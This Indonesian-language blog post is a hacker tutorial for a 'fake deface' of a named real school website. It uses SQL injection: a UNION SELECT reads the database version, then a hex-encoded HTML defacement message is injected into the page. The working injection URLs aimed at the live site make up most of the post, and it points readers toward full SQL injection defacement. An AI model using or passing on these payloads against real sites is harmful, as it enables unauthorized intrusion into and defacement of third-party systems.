pertama,jadi yg kita lakuakn cm deface palsu...deface yg hanya bs d baca dr sisi client,seperti XSS..gmn crnya ?lnjut ..
1.Siapin target ,mau SQL versi 4 atau versi 5 jg boleh.kl lupa nihh
2.nah misalnya udah dapet target nih [http://www.sttheresia-jkt.sch.id/home.php?t=tk&i=4]
3.cek versinya... [http://www.sttheresia-jkt.sch.id/home.php?t=tk&i=-4 union select 1,@@version,3,4,5,6--]
Web Diatas Versinya 5 , Tapi Kalo Nemu Versi 4 Juga Jangan Khawatir Yee ..
drpd cape ngeblind..
yaudah buat gaya2an..
deface palsu ajaa..
kalian tw kan yg ngerubah ascii jd hex code?
kl bingung,buka ini http://dieq41.com/tools/text.html
nah coba buat script deface,misal <h1>Ini Hanya Untuk
Demo Dari Tutorial Gua Yang Deface Palsu..
hahahahahaha<br><br><br>By BLACK32HIDDEN From BANDUNG
BLACKHAT</h1>
masukin ke bagian ASCII yg ada d web dieq41..
trus kl ud d masukin..liat bagian hexadecimal,bakal muncul: 3C68313E496E692048616E796120556E74756B2044656D6F2044617269205475746F7269616C204775612059616E6720446566616
nah kode d atas tuh kodehasil convert dr ascii ke hex..
nah,,skrg yg kode 3C68313E496E692048616E796120556E74756B2044656D6F2044617269205475746F7269616C204775612059616E6720446566616
oke,coba masukin d angka 3 ,yg script hex nyaa..
http://www.sttheresia-jkt.sch.id/home.php?t=tk&i=-4 union select 1,0x3C68313E496E692048616E796120556E74756B2044656D6F2044617269205475746F7269616C204775612059616E672044656
ew.kok ada hacked by me?hhe..itu tandanya udah berhasil sob..
makanya ak bilang ini cm client aja..ask : kl mau deface bneran?yaudah gawei dewek ..kan ad tutor sql injectionnya tuh..
ok sob smua,makasih2.
No comments:
Post a Comment